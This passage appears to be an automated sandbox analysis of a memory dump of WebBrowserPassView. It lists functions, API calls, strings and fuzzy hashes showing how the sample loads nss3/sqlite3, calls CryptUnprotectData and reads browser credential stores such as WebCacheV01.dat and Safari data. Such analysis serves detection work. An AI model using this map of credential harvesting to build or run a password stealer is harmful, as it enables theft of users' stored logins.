Opcode Fuzzy Hash: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
Instruction Fuzzy Hash: 83C04C351107028BE7218B12C849753B7F8BB00717F40C818A566859A0D77CE454CE18

Uniqueness

Uniqueness Score: -1.00%

Function 00411F7E, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,?,00411EF8,00000000), ref: 00411F8D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
Instruction ID: 6c621939844f31da33ced499d0f7f7abb962291178acb537878d9391fa7c1b50
Opcode Fuzzy Hash: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
Instruction Fuzzy Hash: C8C09B32194342BBD7019F508C05F1B7A95BB55703F104C297561940B0C75140549605

Uniqueness

Uniqueness Score: -1.00%

Function 00407548, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
Instruction ID: 786af1a6681fc588f4ed673612d44b37cd66a9ddadc6b0c90f2aca86fde3c3ed
Opcode Fuzzy Hash: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
Instruction Fuzzy Hash: 41B012792100404BCB080B349C4504D75506F46B32B20473CB073C00F0DB30CD70BA00

Uniqueness

Uniqueness Score: -1.00%

Function 00411B67, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
Instruction ID: 8fd1618fdc001f910610ea30bed12e65be45571f6aff6d2ea6de46bc6098db87
Opcode Fuzzy Hash: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
Instruction Fuzzy Hash: F8C09B35544301BFDE114F40FD05F09BF71BB84F05F004414B244640B1C2714414EB17

Uniqueness

Uniqueness Score: -1.00%

Function 004081EA, Relevance: 1.4, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3

free.MSVCRT(?,00000000,?,00000000), ref: 004082B2

Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010

Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$mallocmemcpy
String ID:
API String ID: 3401966785-0
Opcode ID: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
Instruction ID: 9a294873d4d6790ac16ff047b4da0d243ffe3cbd3c442eed78fe53e82fef6e86
Opcode Fuzzy Hash: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
Instruction Fuzzy Hash: 22513672D006099BCB10DF99C5804DEBBB5BB48314F60817FE990B7391DB38AE85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00419681, Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71768e3b57be439b0f9ce1a84ee98f19883832beed36a2a3ef83e6d3b54edd1a
Instruction ID: 4be01e504a1dbe863e5cd1883b5f47abe9c308d3627063d178914d84215e5ed1
Opcode Fuzzy Hash: 71768e3b57be439b0f9ce1a84ee98f19883832beed36a2a3ef83e6d3b54edd1a
Instruction Fuzzy Hash: 32319E31614206EFDF14AF15D9517DAB3A0FF00364F11412BF8259B290EB38EDE09BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004059F7, Relevance: 1.3, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00405A28

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp
String ID:
API String ID: 2081463915-0
Opcode ID: 47d81a72ba5e86c6c08ea2f576f41ce6956625c552654a9f8307a541cecd461b
Instruction ID: a3dc623871aa55e9e138b6aa735e1cfc4d22eb4fa3c35538bc996f6fefcd79cf
Opcode Fuzzy Hash: 47d81a72ba5e86c6c08ea2f576f41ce6956625c552654a9f8307a541cecd461b
Instruction Fuzzy Hash: 65113A75600A05AFCB14DF69C9C19ABB7F8FF04314B10463EA456E7241DB34E9458F68

Uniqueness

Uniqueness Score: -1.00%

Function 004050B7, Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00405137: CloseHandle.KERNEL32(000000FF,004050C7,00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF), ref: 0040513F

Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156

GetLastError.KERNEL32(00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF,00000000,00000104), ref: 00405124

Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID:
API String ID: 2136311172-0
Opcode ID: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
Instruction ID: 849b43cde7c86ee220a2fa92f028283b8c7de21471a02e191cd59f19f3ad1342
Opcode Fuzzy Hash: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
Instruction Fuzzy Hash: DD0181B1815A008AD720AB65DC057A776E8DF11319F10893FE5A5EF2C2EB7C94408E6E

Uniqueness

Uniqueness Score: -1.00%

Function 004085EB, Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 00408604: ??3@YAXPAX@Z.MSVCRT ref: 0040860B

??2@YAPAXI@Z.MSVCRT ref: 004085F4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
Instruction ID: 922d8024f7c410ba2bf811e6c001bae8f16a2ee087a1061d919dd730706e44d9
Opcode Fuzzy Hash: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
Instruction Fuzzy Hash: 36C02B3241D2101FD764FFB4360205722D4CE822383014C2FF0C0D3100DD3884014B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408037, Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
Instruction ID: b2304b4461d9917b15a132db01dd128865174dbe20628525ae7b4e3248e143f9
Opcode Fuzzy Hash: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
Instruction Fuzzy Hash: 17C08CB24107018FF7308F11C905322B3E4AF0073BFA08C0EA0D0914C2DBBCD084CA08

Uniqueness

Uniqueness Score: -1.00%

Function 00402778, Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
Instruction ID: cac01d1bc301b84fbdbddb48431dcac5afc2edf88536e2650f831a4bf4b80b8a
Opcode Fuzzy Hash: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
Instruction Fuzzy Hash: 7AC00272550B019FF7609F15C94A762B3E4AF5077BF918C1DA4A5924C1E7BCD4448A18

Uniqueness

Uniqueness Score: -1.00%

Function 00412B6F, Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00412B73

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
Instruction ID: 46b4f55e9d8111901284769a6e1cf788246b5727949f953e2d9518689c8df02f
Opcode Fuzzy Hash: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
Instruction Fuzzy Hash: AC900282455501216C4522755D1750511080851176374074A7032A59D1DE688150601C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00441975, Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004419A0
wcscpy.MSVCRT ref: 004419B7
memset.MSVCRT ref: 004419EA
wcscpy.MSVCRT ref: 00441A00
wcscat.MSVCRT ref: 00441A11
wcscpy.MSVCRT ref: 00441A37
wcscat.MSVCRT ref: 00441A48
wcscpy.MSVCRT ref: 00441A6F
wcscat.MSVCRT ref: 00441A80
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
LoadLibraryW.KERNEL32(sqlite3.dll,?,00000104,00000000), ref: 00441AB9
LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000104,00000000), ref: 00441AC7
LoadLibraryW.KERNEL32(nss3.dll,?,00000104,00000000), ref: 00441AD7
GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00441B0C
GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00441B19
GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00441B26
GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00441B33
GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00441B40
GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00441B4D
GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00441B5A

Strings

nss3.dll, xrefs: 00441AD2
sqlite3_column_int64, xrefs: 00441B28
sqlite3_column_int, xrefs: 00441B1B
mozsqlite3.dll, xrefs: 00441AC2
\nss3.dll, xrefs: 00441A7A
sqlite3_close, xrefs: 00441B42
sqlite3_exec, xrefs: 00441B4F
sqlite3_step, xrefs: 00441B01
sqlite3_finalize, xrefs: 00441B35
sqlite3.dll, xrefs: 00441AB4
sqlite3_column_text, xrefs: 00441B0E
\mozsqlite3.dll, xrefs: 00441A42
sqlite3_open, xrefs: 00441AED
sqlite3_prepare, xrefs: 00441AF5
\sqlite3.dll, xrefs: 00441A0B

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
API String ID: 2522319644-522817110
Opcode ID: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
Instruction ID: 320c17c5e6ace6947bedab1e2bf77c9c6d077df099d9b5840aba930edb5fc244
Opcode Fuzzy Hash: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
Instruction Fuzzy Hash: 855165B1901709BADB20FFB18D49A4BB7F8AF08704F5008ABE54AE2551E778E644CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0041604B, Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00416065
memcpy.MSVCRT ref: 00416074
GetCurrentProcessId.KERNEL32 ref: 00416085
memcpy.MSVCRT ref: 00416098
GetTickCount.KERNEL32 ref: 004160AC
memcpy.MSVCRT ref: 004160BF
QueryPerformanceCounter.KERNEL32(?), ref: 004160D5
memcpy.MSVCRT ref: 004160E5

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4218492932-0
Opcode ID: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
Instruction ID: b821822af8fa1f08beba458ee4fa97db6355aebb6f9a48b4278dc6bbcb45c8c8
Opcode Fuzzy Hash: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
Instruction Fuzzy Hash: 601163F3900118ABDB00EFA4DC899DAB7ACEF19710F454536FA09DB144E674E748C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00407E0E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00407E26
FindNextFileW.KERNEL32(00000000,?), ref: 00407E45
FindClose.KERNEL32(00000000), ref: 00407E65

Strings

nss3.dll, xrefs: 00407E18
., xrefs: 00407E33
ld@, xrefs: 00407E51

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$ld@$nss3.dll
API String ID: 3541575487-3654816495
Opcode ID: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
Instruction ID: 78963b1eb2bf7b5f8aa15039180698213c9a680973a94e339c68aae197af375e
Opcode Fuzzy Hash: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
Instruction Fuzzy Hash: CEF0BB75901528ABDB206BB4DC8C9ABB7ACEB45765F0401B2ED06E3180D334AE458AD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D674, Relevance: 4.5, APIs: 3, Instructions: 41fileclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506

OpenClipboard.USER32(?), ref: 0040D6B0
GetLastError.KERNEL32 ref: 0040D6C9
DeleteFileW.KERNEL32(?), ref: 0040D6E8

Part of subcall function 00407363: EmptyClipboard.USER32 ref: 0040736D
Part of subcall function 00407363: GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
Part of subcall function 00407363: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
Part of subcall function 00407363: GlobalLock.KERNEL32 ref: 004073A8
Part of subcall function 00407363: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
Part of subcall function 00407363: GlobalUnlock.KERNEL32(00000000), ref: 004073CD
Part of subcall function 00407363: SetClipboardData.USER32 ref: 004073D6
Part of subcall function 00407363: CloseHandle.KERNEL32(?), ref: 004073EA
Part of subcall function 00407363: CloseClipboard.USER32 ref: 004073FE

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
String ID:
API String ID: 2633007058-0
Opcode ID: 27fa221fbd852bde5ab3e37b7c4579dba1b3dae105a290b2fbc18255b5855c3f
Instruction ID: bc74c52ab6c87c34bb6cce86e30c95d4cd513021a264dd7f219e40d67a453ac4
Opcode Fuzzy Hash: 27fa221fbd852bde5ab3e37b7c4579dba1b3dae105a290b2fbc18255b5855c3f
Instruction Fuzzy Hash: 45F0C831B0030457EB646B71DC4EFAF376DAB40B01F00057AF469A51E2EFBAF9458A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407674, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
Instruction ID: 443b7a688d421a19dce43b17e8414db768b780ab8005fe7e93b00bb89c3c7b35
Opcode Fuzzy Hash: b36f1e02b416ec865f4d87fb5f88c2c9fdef71dbbf2c75f0f10f81923867f6e4
Instruction Fuzzy Hash: 76C0803C5002205FD7C04B88BC047C375B85B86727F004073ED40A1251C378680CCF9C

Uniqueness

Uniqueness Score: -1.00%

Function 004021D9, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00402201
_wcsicmp.MSVCRT ref: 00402231
_wcsicmp.MSVCRT ref: 0040225E
_wcsicmp.MSVCRT ref: 0040228B

Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E

memset.MSVCRT ref: 0040262F
memcpy.MSVCRT ref: 00402664

Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897

memcpy.MSVCRT ref: 004026C0
LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040271E
FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040272D

Strings

`, xrefs: 004024A1
n, xrefs: 0040258E
com.apple.WebKit2WebProcess, xrefs: 00402656
t, xrefs: 0040261A
>, xrefs: 004022D4
w, xrefs: 004024D8
Data, xrefs: 00402280
/, xrefs: 004024DF
O, xrefs: 00402360
I, xrefs: 004023F3
{, xrefs: 00402383
X, xrefs: 00402605
=, xrefs: 0040251E
K, xrefs: 0040239F
g, xrefs: 0040231A
H, xrefs: 004022DB
>, xrefs: 004022E9
!, xrefs: 00402525
&, xrefs: 0040230C
', xrefs: 004023D7
h, xrefs: 004024BD
@, xrefs: 00402533
z, xrefs: 0040255D
y, xrefs: 00402352
Path, xrefs: 00402226
server, xrefs: 004021ED
}, xrefs: 004022E2
u, xrefs: 0040244D
A, xrefs: 0040236E
0, xrefs: 0040240E
n, xrefs: 0040254F
~, xrefs: 00402579
^, xrefs: 004025FE
H, xrefs: 004022CD
t, xrefs: 004025F7
8, xrefs: 0040249A
2, xrefs: 00402580
&, xrefs: 004025C6
L, xrefs: 004025E9
u, xrefs: 004023DE
com.apple.Safari, xrefs: 00402634
F, xrefs: 004023A6
$, xrefs: 0040259C
S, xrefs: 004024D1
K, xrefs: 0040253A
y, xrefs: 00402469
\, xrefs: 00402510
), xrefs: 004025AA
Account, xrefs: 00402253
t, xrefs: 0040252C
#, xrefs: 004025CD
b, xrefs: 004022F7
a, xrefs: 004024ED
q, xrefs: 004024AF

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 462158748-1134094380
Opcode ID: 77a1b1b6f1160c8da7bc509bbcfd5bc0ca8aed1e625a5ef69c1f2e6acdd1c49f
Instruction ID: cc44404655acc20b5533cc0c34fbbab0c7f11d0fd0cfcd5d05bb593c6a12ed59
Opcode Fuzzy Hash: 77a1b1b6f1160c8da7bc509bbcfd5bc0ca8aed1e625a5ef69c1f2e6acdd1c49f
Instruction Fuzzy Hash: C9F1FF208087E9C9DB32D7788D097CEBE645B23324F0443D9E1E87A2D2D7B55B85CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00409B6A, Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 275stringCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00409B82
_wcsicmp.MSVCRT ref: 00409B97
_wcsnicmp.MSVCRT ref: 00409BB1
_wcsnicmp.MSVCRT ref: 00409BC5
wcslen.MSVCRT ref: 00409BD6
_wcsicmp.MSVCRT ref: 00409BF8
memset.MSVCRT ref: 00409C3D
wcscpy.MSVCRT ref: 00409C4A
wcslen.MSVCRT ref: 00409C6B
wcslen.MSVCRT ref: 00409C83
_wcsicmp.MSVCRT ref: 00409CC8
_wcsicmp.MSVCRT ref: 00409CDB
_wcsnicmp.MSVCRT ref: 00409CF2
memset.MSVCRT ref: 00409D38
wcschr.MSVCRT ref: 00409D40
wcslen.MSVCRT ref: 00409D48
wcscpy.MSVCRT ref: 00409D66
wcschr.MSVCRT ref: 00409D74
_wcsnicmp.MSVCRT ref: 00409DA4
memset.MSVCRT ref: 00409DD8
strlen.MSVCRT ref: 00409DDE
memcpy.MSVCRT ref: 00409DFA
strchr.MSVCRT ref: 00409E0F
memset.MSVCRT ref: 00409E39
memset.MSVCRT ref: 00409E4E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00409E6F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00409E82

Strings

internet explorer, xrefs: 00409B76, 00409B7B, 00409B93
:stringdata, xrefs: 00409BF2
http://, xrefs: 00409BAB
wininetcachecredentials, xrefs: 00409CBF, 00409CC4, 00409CD7
https://, xrefs: 00409BBF
dpapi:, xrefs: 00409D9E
ftp://, xrefs: 00409CEC

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
API String ID: 2787044678-1843504584
Opcode ID: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
Instruction ID: bbe16b9e6473d86cc6eed57c0ed50d6d6787e5e5d2f3b2995f82d19aea11410f
Opcode Fuzzy Hash: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
Instruction Fuzzy Hash: 2891A571940209BFEF20EF55CD41EDF77A8AF54314F10006AF848A3292EB79EE508B68

Uniqueness

Uniqueness Score: -1.00%

Function 004113F4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00411421
GetDlgItem.USER32 ref: 0041142D
GetWindowLongW.USER32(00000000,000000F0), ref: 0041143C
GetWindowLongW.USER32(?,000000F0), ref: 00411448
GetWindowLongW.USER32(00000000,000000EC), ref: 00411451
GetWindowLongW.USER32(?,000000EC), ref: 0041145D
GetWindowRect.USER32 ref: 0041146F
GetWindowRect.USER32 ref: 0041147A
MapWindowPoints.USER32 ref: 0041148E
MapWindowPoints.USER32 ref: 0041149C
GetDC.USER32 ref: 004114D5
wcslen.MSVCRT ref: 00411515
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00411526
ReleaseDC.USER32 ref: 00411573
_snwprintf.MSVCRT ref: 00411636
SetWindowTextW.USER32(?,?), ref: 0041164A
SetWindowTextW.USER32(?,00000000), ref: 00411668
GetDlgItem.USER32 ref: 0041169E
GetWindowRect.USER32 ref: 004116AE
MapWindowPoints.USER32 ref: 004116BC
GetClientRect.USER32 ref: 004116D3
GetWindowRect.USER32 ref: 004116DD
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411723
GetClientRect.USER32 ref: 0041172D
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411765

Strings

EDIT, xrefs: 0041160B
%s:, xrefs: 0041162B
STATIC, xrefs: 004115D5

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
Instruction ID: 8ff438caca04d900f401a49fee0f0db12add2221ca5be9c1dac879361ae65e4d
Opcode Fuzzy Hash: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
Instruction Fuzzy Hash: E3B1B071108341AFD720DF68C985E6BBBF9FB88704F004A2DF69692261DB75E944CF16

Uniqueness

Uniqueness Score: -1.00%

Function 0040109F, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004010F7
ChildWindowFromPoint.USER32 ref: 00401109
GetDlgItem.USER32 ref: 0040113F
ChildWindowFromPoint.USER32 ref: 0040114C
GetDlgItem.USER32 ref: 0040117A
ChildWindowFromPoint.USER32 ref: 0040118C
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
LoadCursorW.USER32(00000000,00000067), ref: 0040119E
SetCursor.USER32(00000000,?,?), ref: 004011A5
GetDlgItem.USER32 ref: 004011C6
ChildWindowFromPoint.USER32 ref: 004011D3
GetDlgItem.USER32 ref: 004011ED
SetBkMode.GDI32(?,00000001), ref: 004011F9
SetTextColor.GDI32(?,00C00000), ref: 00401207
GetSysColorBrush.USER32(0000000F), ref: 0040120F
GetDlgItem.USER32 ref: 00401230
EndDialog.USER32(?,?), ref: 00401265
DeleteObject.GDI32(?), ref: 00401271
GetDlgItem.USER32 ref: 00401296
ShowWindow.USER32(00000000), ref: 0040129F
GetDlgItem.USER32 ref: 004012AB
ShowWindow.USER32(00000000), ref: 004012AE
SetDlgItemTextW.USER32 ref: 004012BF
SetWindowTextW.USER32(?,WebBrowserPassView), ref: 004012CD
SetDlgItemTextW.USER32 ref: 004012E5
SetDlgItemTextW.USER32 ref: 004012F6

Strings

WebBrowserPassView, xrefs: 004012C5

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: WebBrowserPassView
API String ID: 829165378-2171583229
Opcode ID: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
Instruction ID: 8d9c6eba8ddb3a7c26c98eaf12cf57faa7ce2db5dd3d1d54ce32cd9ff2fd20fc
Opcode Fuzzy Hash: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
